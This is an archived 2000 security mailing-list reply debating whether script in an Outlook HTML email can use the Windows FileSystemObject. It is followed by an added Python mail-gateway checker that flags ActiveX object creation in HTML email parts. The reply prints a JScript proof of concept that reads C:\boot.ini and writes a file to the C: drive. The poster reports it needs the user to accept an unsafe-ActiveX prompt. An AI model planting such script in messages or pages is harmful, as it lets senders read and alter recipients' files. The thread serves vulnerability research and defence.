Vulnerability Development mailing list archives
Re: Outlook/HTML "proggie"
From: mrousseau () LABCAL COM (Maxime Rousseau)
Date: Thu, 1 Jun 2000 11:07:52 -0400
I have tested this a little bit here and I have not been able to use the FSO within an HTML message, unless the user explicitly clicks YES at the prompt for unsafe ActiveX or has his security set to allow unsafe ActiveX in HTML emails. That's not so by default, and if your 'CAN' involves the user clicking the YES box, then it's not all that great; you might as well have a VBScript file attached. My point was (and still is) that you can't use an FSO in an HTML eMail in a transparent-to-user manner; sorry if I was unclear.

I used the following code in the HTML message and couldn't get it to run transparently:

<script>
var fso, bFile, nFile;
fso = new ActiveXObject("Scripting.FileSystemObject");
// iomode 1 = ForReading; third argument 0 = do not create the file
bFile = fso.OpenTextFile("C:\\boot.ini",1,0);
document.write(bFile.ReadAll());
// Write a marker file to the root of C:
nFile = fso.GetFolder("C:\\").CreateTextFile("spoitdemo.txt");
nFile.Write("Hello, This text file was written by an eMail, it could very well have been a virus!");
nFile.Close();
bFile.Close();
</script>

If you are able to do it, then by all means please send a sample! If you get the "unsafe ActiveX" box, then never mind, this isn't very useful.

M.

PS: Does anyone have details on what was used in the herald's "hell virus" story? As in, what objects?

! -----Original Message-----
! From: VULN-DEV ( Shelagh Pepper )
! Sent: Thursday, June 01, 2000 9:00 AM
! To: VULN-DEV () SECURITYFOCUS COM
! Subject: Re: Outlook/HTML "proggie"
!
! A script within the body of an email CAN access the FileSystemObject if the
! Scripting host is available. I will send a sample separately. Most of the
! code in my sample is directly lifted from the Microsoft Scripting samples
! on their website.
!
! Shelagh
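
A mail-gateway check for the pattern discussed in this thread, as an added example that is not part of the original posts: it parses a message, decodes each text/html part, and reports the ProgIDs that script blocks pass to ActiveXObject or CreateObject. The function and class names, the regex and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser

# Matches JScript `new ActiveXObject("X")` and VBScript `CreateObject("X")`.
PROGID_RE = re.compile(r'(?:ActiveXObject|CreateObject)\s*\(\s*["\']([\w.]+)["\']', re.I)

class ScriptCollector(HTMLParser):
    """Collects the text of every <script> element in an HTML body."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def activex_progids(raw_message):
    """Return sorted, lower-cased ProgIDs instantiated by scripts in text/html parts."""
    msg = message_from_string(raw_message, policy=policy.default)
    found = set()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue  # plain-text parts and attachments are out of scope here
        collector = ScriptCollector()
        collector.feed(part.get_content())  # get_content() undoes base64/quoted-printable
        for script in collector.scripts:
            found.update(p.lower() for p in PROGID_RE.findall(script))
    return sorted(found)

# Constructed sample message (not taken from the thread).
SAMPLE = (
    "From: a@example.test\nTo: b@example.test\nSubject: constructed sample\n"
    "MIME-Version: 1.0\nContent-Type: text/html; charset=us-ascii\n\n"
    '<html><body><script>var fso = new ActiveXObject("Scripting.FileSystemObject");'
    "</script><p>hello</p></body></html>\n"
)

if __name__ == "__main__":
    print(activex_progids(SAMPLE))
```

Parsing the MIME structure first matters because a plain string search over the raw message misses script carried in a base64 or quoted-printable encoded HTML part.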